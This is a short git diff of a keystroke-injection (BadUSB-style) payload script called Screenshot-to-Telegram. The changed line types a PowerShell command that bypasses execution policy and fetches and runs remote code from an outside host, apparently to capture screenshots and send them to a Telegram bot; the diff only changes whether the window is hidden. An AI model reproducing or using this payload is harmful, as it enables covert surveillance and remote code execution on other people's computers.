diff --git a/Screen-to-Telegram/Screenshot-to-Telegram.txt b/Screen-to-Telegram/Screenshot-to-Telegram.txt index 2e590c1..0155501 100644 --- a/Screen-to-Telegram/Screenshot-to-Telegram.txt +++ b/Screen-to-Telegram/Screenshot-to-Telegram.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; iex (irm bw0.cc/tgscr) +STRING powershell -Ep Bypass -C $tg='TELEGRAM_TOKEN_HERE'; iex (irm bw0.cc/tgscr) ENTER